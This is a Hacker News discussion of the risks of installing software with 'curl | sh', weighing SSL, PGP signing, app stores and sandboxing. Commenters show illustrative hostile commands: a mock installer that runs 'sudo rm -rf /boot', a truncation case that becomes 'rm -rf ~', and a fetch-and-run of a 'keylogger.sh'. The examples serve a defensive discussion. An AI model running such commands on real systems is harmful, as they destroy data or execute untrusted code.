Hacker News new | past | comments | ask | show | jobs | submit login
curl | sh (curlpipesh.tumblr.com)
96 points by lelf on Nov 3, 2014 | hide | past | favorite | 112 comments



Note that dowloading an app (.exe for windows, or an apple app) and running it, is just as bad. Downloading an installer, and running it, is also insecure. So the question is... What is the proper alternative?

I think the best alternatives are appstores such as found on ios and android, right?

However that doesnt really fit for open source. Is the way to install open source software, to download the source and compile it from scratch? Well, thats also risky, you should check the source code first...? But thats undoable.

All in all, it comes down to "trust". Do you trust the website? You dont care about security too much, well, imho then it makes sense to curl | sh.


I've written down some general principles we should follow, but any reasonable implementation of them seems pretty far off:

https://defuse.ca/triangle-of-secure-code-delivery.htm

tl;dr: (1) Reproducible builds, (2) Make sure everyone is getting the same thing (to detect targeted attacks) and (3) Cryptographic signing.

Package managers and appstores are the best we have right now, but they're missing (1) and (2). In the meantime, offering a pgp-signed installer file is a lot better than curl | sh.


I'm really surprised this hasn't gotten more attention from the commenters here. :(

^~ To the people scrolling by at 70 mph: READ THIS


`curl | sh` is protected by a ssl certificate issued by CA that my system trusts.

"pgp-signed installer file" is protected by a key from a stranger.

Both are insecure.

Could you enumerate several points that show "pgp-signed installer file is __a lot better__ than curl | sh" ?


Say we're trying to download the PHP source code from php.net. If all that's protecting us is SSL, then if an adversary compromises the php.net servers (happens all the time, and actually has happened to PHP), they can immediately replace all the downloads with backdoored copies. Whereas with a PGP signature, the key can be stored off-line (even on an air-gapped system), so that even if the web server is compromised, the adversary can't make me believe the file is legit.

PGP can also be used in a trust-on-first-use manner. Get the public key once over an insecure channel, and if the attacker missed that single opportunity, you're safe until the key changes. With SSL, on the other hand, you're at risk every single time you make a connection, because any of hundreds of CAs has the power to sign that certificate, and as above, you have to assume the web server isn't compromised.

Another reason PGP is important is mirroring. Big F/OSS projects let others' volunteer mirrors. Even if those mirrors support SSL and the transport from the author to the mirror is encrypted, there's absolutely no guarantee that the mirrors themselves are not malicious. The mirrors could be backdooring their own files. The fact that you have an SSL connection to the mirror doesn't do anything to prevent this. But with PGP signatures, you're assured the files come from the software's developer, and haven't been tampered with by the mirror.

So the difference is: SSL secures the connection between your browser and the web server. PGP ensures you're getting the file the software developer intended you to get. It's a semantic difference.

I'd also argue hard against `curl | sh` for (assuming it exists) the psychological effect of teaching users that it's OK to pipe random things from the web into sh.


If an adversary compromises php.net server then naturally the files will be signed by adversary's keys. In both cases, all you need is the ability to replace files (the package files, signature files, html instructions), nothing else. I don't see how gpg is __a lot more__ secure here.

You need some other channel to communicate what keys should sign what files. You need some other channel to import the keys. Catch 22.

"trust-on-first-use" do you mean something like the certificate pinning?

Let's consider https://www.torproject.org It uses GPG signatures for its packages.

If SSL is compromised as you say then all I need to fool you is to give you files that are signed using my keys (unless you know that you should use 0x416F061063FEE659 key (magic secure channel) and you've already imported it (again the magic channel) and tor never changes the key.

Where should I go to check that 0x416F061063FEE659 and pool.sks-keyservers.net are correct values (google?) if we assume that the key and the key server (and the connection to it) are not compromised?

Ask yourself: when was the last time that you've tried to check that the instructions that show the key fingerprint, the key server to use are genuine?

Also, If you have paper walls I wouldn't try too hard to make the door impenetrable. It is a trade-off: if you are downloading code from stranger's repository then you won't get much from replacing `curl https://github.com/... | sh` with a gpg-signed (by the same stranger) download.

Security is like onion rings: there are layers but it is only as strong as its weakest link. We know that a real adversary will just hack your machine if necessary.


No it's not because MSI packages and EXEs are signed so there is at least a chain of trust. SmartScreen kicks you in the face if it's not "known" by various metrics and it's hard to get around that these days (as someone who just had to get EV certs for their MSI). If you click through that, and you don't know what the source was then you're a muppet.

curl + bash is suck and blam the machine. Hope you didn't do a sudo in the last few seconds...

http://www.nastybastard.com/funky-super-installer.sh:

   #!/bin/bash
   echo "mwuhahahaha"
   sudo rm -rf /boot


> No it's not because MSI packages and EXEs are signed

Sure, some are. But most software packages that a user is going to download aren't signed.


Right. And really, who checks signatures?

I'm a developer and I don't think I've every checked an md5 signature of a jarfile/gem/package I've downloaded. Nor have I ever been in an environment where that was ever mentioned. (Have mostly worked in small to medium businesses--I imagine that bigger orgs or the defense department might do this.)


You might be surprised. I just pulled up Process Explorer, which makes it easy to see which running apps are signed, and the only unsigned things I'm currently running are VLC, Evernote, and some Brother Printer utilities.

Things from Google, Intel, MS, VMWare, Spotify, Github, Dropbox, and even f.lux are all signed. Of course YMMV but the trend has been positive.

(A little worrisome is that there are two running Broadcom bluetooth apps that have explicitly revoked signatures...I wonder what that's about.)


SSL certificate signing provides basically the same level of trust as a signed installer. As long as you curl over https from the domain you trust, you're good.


Actually no as that signs the communications and not the software. If the target server is compromised then you are screwed. Also for example there is no guarantee that github.com isn't serving malicious traffic from one user under a legitimate request I.e. the poisoned sharecrop problem.

EV signed software is usually done off the internet. In our case we use a physical key to sign it offline and then upload.


> No it's not because MSI packages and EXEs are signed

Is it more difficult to provide your own fake exe installer than to middle-man https that curl examples use?


The question is, is it easier to place your code on that curl site. If there is some web-layer vulnerability, you can put your own code there.

With signed MSIs and EXEs, you'd need to get your code signed, which is probably more difficult than the web layer.


I get a little bit of heartburn over running arbitrary scripts downloaded from internet websites.

The easiest alternative is to run "curl <blah>", download the script, take a peek at the source, and only THEN follow up with the sh.

I mean, you're probably going to see a bunch of "download and install" commands, so you don't get much reassurance if you're worried that one of THOSE might be compromised too. But that's a problem inherent to unsigned internet installer scripts. At least you've somewhat mitigated the possibility that it's dumping your private SSH key to a server somewhere or some other blatantly malicious command.

On the other hand, the script might also include appropriate SHA1 verification commands, or be setting up a repository in a package manager, in which case it's pretty reasonable to trust the script.


My preferred hypothetical installer Trojan method is to make it append a value to ~/.ssh/authorized_keys and then ping a C&C server with the current username and IP ;)


You would still have to hope that sshd is enabled and accepting connections (which by default it shouldn't, at least on end-user distros).


True. I've mostly seen PHP devs using this to deploy composer onto staging and production servers, so it would work on them. ;)


The proper alternative is some sort of lightweight virtualization like Docker, with a proper security policy in place. You can mostly do this today

    curl <blah> | docker run --rm -t -i ubuntu sh
but the containerizing naturally locks down/virtualizes some stuff you might want the script to be doing, like installing stuff locally.

I think cleaning this up and making it friendly enough is a solvable UX problem, but I haven't quite solved it yet.


I can't tell if you're trolling, but "put some Windex on it" (or in this case, containerization) is hardly a solution, only a bad workaround. The root cause of curl | sh being a broken paradigm to begin with is left unaddressed.


I'm not sure that curl | sh is a "broken paradigm" -- no more broken than than running JavaScript in a browser. The only difference between the two is in the sandboxing.

The solution I'm proposing isn't to add Windex, but to cleanly wrap whatever curlpipesh is doing. Make it equivalent to opening a browser tab: interact with it safely, keep what you like, and throw everything away if you don't like the way things look.

Curlpipesh can be just like loading a site. We have the technology to do it; we just need to figure out the UX.


I think one of the larger issues with curl | sh is what could happen in the event of a network outage or early termination on the connection.

For example, if you're downloading a script that has a line like this

  rm -rf ~/.tmp/foo/bar
But the HTTP connection was lost before the entire file was downloaded and `rm -rf ~` was the end of one packet and `/.tmp/foo/bar` was the contents of the other (lost) packet, you're screwed. The incomplete script will still be piped to sh and it's game over.


I had something like that happen once, but it worked out in my favor. I had misconfigured BIND, which I had intended to run just as a caching name server for my network, and it was listening for outside connections too. Some variant of the Lion worm found it and used a BIND bug to get onto my system.

It sent my password file to someone in China, started a scanner to look for other systems to infect, downloaded a .tar.gz file that contained a root kit to hide itself, unpacked the .tar.gz, and ran the install script contained therein to install the root kit.

Or rather, it tried to. I had ISDN at the time, and had noticed the modem lights heavily blinking even though I was not doing any internet activity. This confused me, and I pulled the plug on the modem. Turns out I pulled the plug while it was downloading the .tar.gz. It got most of the file, but not quite all of it. It lost the last file inside the archive--which happened to be the install script!

Without the install script, it could not install the root kit, and that made getting rid of the worm a heck of a lot easier.


This can be mitigated by wrapping your whole script in parens, as in:

  #!/usr/bin/env bash
  (
    # real work
  )


Why don't shells NOT execute a command if there's no trailing EOL character, to mitigate this very problem?


Why should shells encourage this behaviour (piping unknown stuff to them?)

You should at least download, verify the size and checksum (if available), take a peek at it, and only then run it.


Because you might be piping known stuff to them. Receiving a partial input stream is not necessarily reliant on networking.


OK, but the detection of partial vs complete script is not as simple as 'does last line have EOL'? There are various builtins that require an end token, like case/esac, if/fi, etc. Do these work properly when truncated at an arbitrary line?


Those control structures do work properly - the shell reads ahead until it finds the end token, and fails if it's absent.

It is true that there remains the problem of potential truncation exactly at the end of a top-level line, but I contend that "it stops running here" is a much easier thing to reason about (and, strictly, could always happen if hit with a SIGKILL anyway) than "does the meaning of this line change if we cut it off in a weird place".


In at least some of those cases, I would expect curl to exit with an error and the pipeline to abort.


All bash sees are bytes coming in on stdin, and eventually an EOF. It neither knows nor cares what caused the EOF.


Sure, but if the server response is not pipelined (as is probably often the case), then bash should never see anything.


HTTP pipelining is about reusing a TCP connection for multiple requests. It doesn't influence when curl outputs data and wouldn't apply here anyway. I don't think there's any mode which would cause curl to buffer the entire response before writing any of it.


Yes, I'm aware of how HTTP pipelining works. It was a poor choice of terminology. My point is that by default curl does buffer some of the response. And if the connection was terminated before the first buffer was output, then I would expect this to result in an error which would abort the shell pipeline.


Yes, in some cases curl won't produce any output, like if the web server is down, or the connection fails before anything is returned. And yes, it would also happen if curl buffers some of the response and then dies. I don't really see why that's interesting.


The default buffer size is typically the page size, which is typically 4096 bytes. I would expect a large number of these scripts to be less than 4096 bytes meaning curl would output nothing before producing an error and the partial script would never be evaluated.


That's the default buffer size for pipes, which won't matter here. When curl terminates, whatever's buffered in the pipe will be flushed. The only thing that could prevent downloaded data from being received by the shell would be internal buffering in curl, if it does any.


Good point. curl doesn't do any internal buffering. I was thinking that the pipeline should be aborted if the curl exits with a non-zero status, but of course this is not the case.


Yeah, it would be nice if there were a way for a part of the pipeline to signal that something bad happened and everything should stop. Ideally, some sort of transaction system so the script is guaranteed to run fully or not at all. But instead we have this crazy thing.


Some scripts also detect this and are written so that there is no code executed before the file is not complete. Of course, that's a minority.


Definitely including a checksum and validating that before executing would be ideal.


To elaborate, this is quite easy: you wrap the entire contents of the script into a function definition, then call the function as the last line.


If you're really paranoid, download the MD5 and PGP keys of the application release's source code tarball from the author's website using SSL. Then unpack the source (being careful to use a sandbox, because an exploit in gzip/tar/etc might be bad) and examine the source code for any unexplained or dangerous behavior. Then compile and install it using a non-root user.

Personally, i'm totally comfortable with the idea of someone owning my box. The files I care about are backed up offline, I don't have many secrets, and the only accounts that would affect my life in general have passphrases, pins and multiple-factor auth tied to them. The worst thing someone could maybe do is impersonate me and cause havoc using my accounts, but I really don't see anyone having cause to do that. Anyway, I don't sweat it.

If you trust your distro, just verify the PGP keys of packages you download before installing, which is mostly automatic for most modern OSes.


""" Personally, i'm totally comfortable with the idea of someone owning my box. The files I care about are backed up offline, I don't have many secrets, and the only accounts that would affect my life in general have passphrases, pins and multiple-factor auth tied to them. The worst thing someone could maybe do is impersonate me and cause havoc using my accounts, but I really don't see anyone having cause to do that. Anyway, I don't sweat it. """

Are you trolling? This sounds like the same sort of argument from the "I don't have anything to hide. NSA/GCHQ can spy on me all they want" camp.


Uh, it's not an argument, it's my personal feelings and my personal opinions. It's OK if you don't feel the same way.


I look forward to you getting 0wned then. Just my personal feelings and personal opinions. :)


Who do you enter your passphrases, pins, etc if you box is controlled by someone else? How do you know there's no keylogger running? How do you use PGP if you don't care about the security of your private key?


I do assume there could be a keylogger. I'd enter a password into the computer, but passphrases would be spoken over the phone to a representative that I call, and pins are entered either over the phone or once I receive them from a 2FA source. I avoid using sensitive accounts online if I can do it over the phone or in person.

(part of why I want 2FA providers to verify an identity using two or more devices is so that if your workstation is compromised, it still couldn't complete the authentication without a secondary device, making mitm much more difficult; though obviously they could still hijack an existing connection on either device... a benefit would be that for example, an attacker couldn't use a hijacked connection to initiate a money transfer behind your back without having you confirm it on your mobile device as well)

If you are depending on PGP, and only install software from verified sources using secure connections, your private key is still secure. If you don't depend on PGP, you wouldn't care about the security of your private key. You could also do private key operations on an airgapped machine, which wouldn't depend on the security of your main workstation.


It's interesting to note that we essentially do the same with javascript in the browser, except the user doesn't even know there's some code that is automatically run.

The big difference, of course, being that javascript code runs in a sandboxed environment. Maybe we should create some kind of sandboxed sh ? (I actually hardly believe it will ever take on, seeing that so many sites tell you to run not `sh` but `sudo sh`... yeah, sure, why have unprivileged users, we should do everything as root anyway)


Well, the Unix approach to this is a sandbox application and a shell application, not a sandboxed shell application. Docker attempts many of those tasks.

On windows there's Sandboxie, which does more or less what you want as well. It creates a sandbox whose filesystem and internals can be modified by sandboxed applications without affecting the state of the REAL filesystem. Very nice utility for mitigating bad programming - I often use it to run multiple copies of applications that crash or refuse to launch multiple instances.


Trust is really the only solution, we as developers might be able to inspect some code before we run it but if it is sufficiently complex we could spend months auditing it. Even worse for the non-technical users that can't tell a hello world from a keylogger, there really is no solution other than some trust based system.


Trust is a partial solution. You need to be able to make sure that you're only trusting those who are trustworthy. A part of that is assessment of trustworthiness, and a part is making sure you're aware who you're trusting (probably allowing delegation).


I agree, it is difficult to find a proper alternative.

App stores do have some advantages here, today. It's also true that they don't well fit the model for open source. App stores define some root of trust for signing, but just like the CA model for HTTPS certificates, there are issues with that. App stores also bring a host of issues with user freedom. (Even the free ones can have this effect unintentionally: what percent of your coworkers know how to manage apt pinning? If one person on ubuntu 10.04 has an working, installed package, and wants to hand that exact (known working) version of it to a friend on ubuntu 12.04, can they do it?)

PGP signed binaries are one major step in the right direction. More friendly tools and popularized workflows for this would help a lot of people avoid major moments of vulnerability.

PGP (or any other signing system) also leave an interesting challenge, which is what to do in the case of key compromise. Revocation is hard. And say you want an audit log of all prior releases: what can you do?

We're all used to git having an immutable log of history by hash chaining, at this point. Is it time to start using systems like that to keep an auditable log of software releases, as well?

I've been working on something called "mdm" [1] that attempts to do an auditable, immutable chain of releases like this. It was originally designed to be a dependency manager for (arbitrary, language-agnostic, any binaries) software development needs, but I wonder if something like this is what the software distribution world needs to start evolving towards as well. Imagine if your end users could all verify that they have the same hash... and the same picture of historic releases from the same author, and the same picture of if the releaser's signing key changed, and so on.

I'd love to hear other thoughts on how hash chains and signatures can be made to intersect to tell the broadest story. The challenges are very real here.

---

[1] https://github.com/polydawn/mdm/


"appstores such as found on ios and android" are actually simpler versions of Linux package management, which fits very well with open-source. Packages are retrieved over HTTPS and signed by maintainers/authors. For distros like Lunar or Gentoo, the source is retrieved in a similar fashion and compiled locally.


I sense that the reason these kinds of things are growing in popularity is that there is a command-line renaissance occurring among certains kinds of developers. I'm guessing that about half of these pages are used principally by Ruby/Rails crowds, for example.

This is a natural outgrowth of Rails itself which expects even the novice dev to do everything from the CLI. I also notice a certain amount of machismo surrounding this sort of thing, which means that the novices are that much more likely to blindly install things, in spite of the more senior devs blandly insisting that they should "read and understand the script before running it." This is ironic because of course they are novices and learning how to do a security audit on a random bash script is a non-trivial affair, to put it most charitably. It's also ironic because Rails is supposed to be all about easy and convention, not auditing everything for oneself.

The designers of OSs did not have in mind non-experts using the CLI with su turned on (or even off) all the time. In fact, user-friendly OSs are designed to prevent non-experts from doing any damage, anywhere. In all, it seems like this sort of thing is circumventing basic protections provided by experts for non-experts, and that is probably not something to encourage.


1. These script-based solutions generally work across a variety of platforms where compiled executables would need to be customized.

2. They give an easy way to automatically download and install a tool in one pasteable command without having to manage downloads and deal with the inevitable extra UI of installer executables.

3. Why does one need to understand what a script is doing any more than one needs to understand what a downloaded installer executable is doing? At least with the shell scripts it seems like more of an option.


when I switched from RoR to Java I started to really understand these issues... with RoR I was using lots of open source code (how can someone be expected to read/comprehend all the code in c++ extension modules as well as a mound of Ruby?). I'm not sure what c++ extensions are actually capable of but it just seems like a scary thought to be able to hook this deeply into the system. Personally I wouldn't want to use a lib that invokes some c++ unless it is from a REALLY reliable source.

So yeah the reason I bring up Java is I think there is strength in the notion of the "App Server" in the java world. It's like a partner for the OS that allows for somewhat of a security "air-lock". Even if using Docker or something to scale RoR / simulate the effect of an app server node, I just fundamentally think an OS has too much power.... a web app shouldn't have any access to it basically, except through known/monitored/regulated protocols and points of access. Basically, data can be handed to an "App server process" which in turn does some low-levelish system tasks, but the app itself can't do them.

Personally I think the app server approach also makes deployments/scaling easier and reduces the need for a sysadmin guru. RoR shops (and languages that follow a similar paradigm) really shouldn't be running any apps that handle sensitive info for example without a Linux guru and a senior Rails dev auditing app modules (or at least keeping up-to-date on existing security audits).

It's weird, those first few months of Java when you realize how limited you are by your EE or whatever type of container -- then it starts to feel natural/healthy. When architected properly, I don't think apps will ever suffer from this lack of freedom.


I don't see how this is less secure than downloading a program and running it. Or downloading some package that asks you to run an install script.

People will see no problem with curl | sh as long as they feel they can trust the source/site asking them to do so. They will be running the same risk as with downloading binaries or install packages.


The truncation issue is an interesting additional wrinkle, if unlikely.

I agree that, aside from that issue, the practice of many people is not materially worse than "curl | sh", but we should condemn that similarly.


Exactly. This is little more than cargo culting.


I'd at least save the script somewhere so i can audit it if something goes wrong after i run it.


Yeah. Of course nobody bothers with providing an installation guide that could be used to build RPM/DEB packages. Because everybody runs `curl | sh` on production machines to install random software.


Previously:

https://news.ycombinator.com/item?id=2420509

Nate Lawson's comment in particular.


https://news.ycombinator.com/item?id=2421012

Sadly, it had become more popular since you posted that comment.


My thing with piping curl to a shell was always that a severed connection will run a partial script, which can have weird consequences. I wrote about it awhile back:

http://blog.seancassidy.me/dont-pipe-to-your-shell.html


I use something different:

    bash -c "$(curl -sfL git.io/wshare || echo "echo 'Installation failed'; exit 1")"
My script itself is the core file and the installer (I used the $BASH_EXECUTION_STRING to grab the source code), i.e. it doesn't download anything additionally. I'm also planning to add a build script that checks the hash of $BASH_EXECUTION_STRING to prevent tampering.


Would something like

    curl http://google.com/keylogger.sh > temp.sh && sh temp.sh
work?


More like:

curl http://google.com/keylogger.sh > temp.sh

less temp.sh # actually read the fucking thing

sh temp.sh

rm temp.sh


Somewhat inexperienced with linux/unix. What's the purpose of "less temp.sh" here?


less is to view the file. It is interactive and safer than cat - the latter because less (by default) strips out terminal control characters.


It avoids that particular problem, yes. It is still inadvisable to do it over http, and checking a digital signature might be even better. Looking at the results might be better still if you have the expertise, though at that point it is more or less isomorphic what everyone happily does in trusting repositories, make files in signed source tarballs, and similar.


I'd also check at least the size, and checksum/GPG signature if available.


Here is another curlpipesh: https://fixubuntu.com/


Except, that one shows the full source so you can copy, paste, review, and save it instead.


You can do that for all of these, just request the file directly and copy it out of the browser.


It's obviously somewhat prone to failure, as the script can't possibly work in every environment. But other than that as long as it's over https is there a security issue?

Obviously, a better alternative is a package manager, pulling from a repository for which you have gpg keys installed (such as Debian provides). But that's not always an option.

Even checking out a git repository and building from source seems as bad a curl | sh to me.


Both curl|sh and git checkouts tend to end up in production deploys so it's interesting to compare them.

Both introduce a point of failure if the remote host becomes unavailable and you need to deploy new machines.

The curl|sh method is vulnerable to change from the maintainer or any attacker who gets access to the storage layer. git is also vulnerable but requires a collision attack on SHA-1.


If you're running it in production then that's a problem. But I'd dare say that relying on an external "apt-get install xxx" is pretty bad practice in production (to deploy new machines).


I agree but most companies I know don't have the infrastructure or best-practices in place to avoid it. Copy-pasting the curl|sh is very low effort and will predictably end up in deploy code (if you have any).


If a git clone from github fails, I can still git clone from the last production machine I successfully cloned to. But this would be no different than curl -o installer.sh; rsync installer.sh; ssh remote@server 'sh installer.sh';

Mismatched SHA-1s are only noticeable when you have one to compare against. A git clone is always fresh, so if the attacker rewrote history, you'd not be warned.


If a git clone from github fails, I can still git clone from the last production machine I successfully cloned to.


`curl ... | sh` installations don't really bother me. The scripts tend to be short and commented, or at least readable. Sure beats running an opaque .pkg installer, which invariably asks for your password (presumably for no reason) and installs god-knows-what all over your hard drive.


Generally, yes, but some package managers have code-signing support, which means if you trust the authors, you can avoid potential hijacks.

At the end of the day, though, you're always going to trust someone with something.


Yes, but if you're doing curl ... | sh then you're not vetting the script you're running before you run it. If you were, you'd be running curl and sh as separate commands.


At least most of the examples are using https.


Mojolicio.us is a good counter-example. Unfortunately, they're not on the Tumblr yet.


Unfortunately the default way of installing Perl modules (cpan command line tool). is just as insecure as curl | sh - Note that we have added an example of securely installing Mojo on the homepage as well, if you have configured Perl for signature verification - http://mojolicio.us/


What I do is simply copy the `curl foo | sh` oneliner into a text editor which does not run in a shell, and then copy the line from there into the console. This does not save you from downloading the script and actually auditing that it does what it should.


I think not saving the script somewhere first makes it worse, You can't go back and inspect what it has actually done in the worst case scenario. To install rust the other day and had to read the whole script to be sure.


Most of these are downloading stuff over https, and sometimes from GitHub, so it really offers superior security to most AppStores and (signed) installers (as you can even look at the source, if you want to).


"superior security"?

If I can hack the endpoint (or the server that handles the 301 redirect to github), game over.


That goes for every software you install. The only solution is to not install any software. And then hope that the preinstalled software on your device is OK:


OR

I could verify an asymmetric cryptographic signature based on a public key I already possess. As long as the private key is not stolen, an attacker who can breach the server cannot backdoor the software I'm downloading.


Which is exactly the same as you verifying the public HTTPS key of the server you're downloading the software from; in reality, the only thing that differs is the server you're targeting (the compilation server, v.s. the downloading server).


The downloading server is necessarily public facing, and the key is necessarily unlocked during operation. In a sense that's a difference in "the server you're targeting", but both are points in favor of pushing that to the compilation server.


The difference is that the private key is on the server that handles HTTPS requests. If the server gets owned, they can change stuff arbitrarily. Having an offline PGP key makes attacks more expensive.


How do you get the public key? I've heard the ssl certificate system that ships with browsers is broken, too.

Maybe it would be an improvement to create a small command line tool that ensures https connections and asks for a hash before running a script?


Key management is out of scope for this discussion. Ideally, it's shipped with your OS. If your OS is insecure, you're already vulnerable.


So you are a fan of the solution that you have to pay the OS provider a fee so that they certify your app? Sure, that's a possibility, but hardly conductive to the open web.


Nope. Don't try to put words in my mouth, please.

apt-get install php-composer is much better than curl https://getcomposer.org/installer | php


How do you get your app into the repository? Maybe for Linux you don't need to pay, but you still need to gain approval of the maintainers. Might be even more costly than simply paying up (as for Apple or Microsoft).


Or you can set up a PPA. :/


But then you are back to square one - how do you establish the trustworthiness of the PPA?


TOFU. Done.


I normally do a curl | less before doing a curl | sh and take a quick peek. Not perfect, but at least it's a step in the right way. Like someone says, it's a matter of trust (but verify).


As already mentioned, save to disk first to avoid network connection failures messing you up. To avoid an extra command use "tee" to output to file while viewing it (i.e. it's "less" and ">" functionality combined).


'To avoid an extra command use "tee" to output to file while viewing it (i.e. it's "less" and ">" functionality combined).'

That's undesirable. First, because you should be making the decision about whether to run the script after you look at it, and if it's already running while you read it then it's probably too late. Second, because you should not be echoing possibly-malicious characters to the terminal - view with less or an editor, tee works like cat here.


"First, because you should be making the decision about whether to run the script after you look at it" - exactly, which is what my suggestion is. All I'm suggesting with tee is that it allows you to read in terminal what you are writing to file in the same command. The OP was downloading the script to view in less, and then downloading it again to execute. This method at least ensures that what you view is what you are going to execute but ...

"Second, because you should not be echoing possibly-malicious characters to the terminal" - this is something I know nothing about, so I would be (and maybe others) highly appreciative of any links about this class of attacks that you could post. Is it possible to execute malicious code while writing to STDOUT, or is it because you can hide malicious code with escape characters? Also, I don't quite understand the "cat" comment as we're not doing any file concatenation here?


"All I'm suggesting with tee is that it allows you to read in terminal what you are writing to file in the same command."

Gotcha. That makes more sense.

Regarding the second, I don't know whether there are presently any attacks in the wild for any commonly deployed setups (if anyone else does, I'd love to hear about them) but terminals are incredibly messy beasts once you start to throw nonprintable characters at them. Better not to expose that surface area.


Race condition. :)

Save it to disk, examine, then run.



What's the worst that could happen? It's only PHP. https://apigility.org/




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: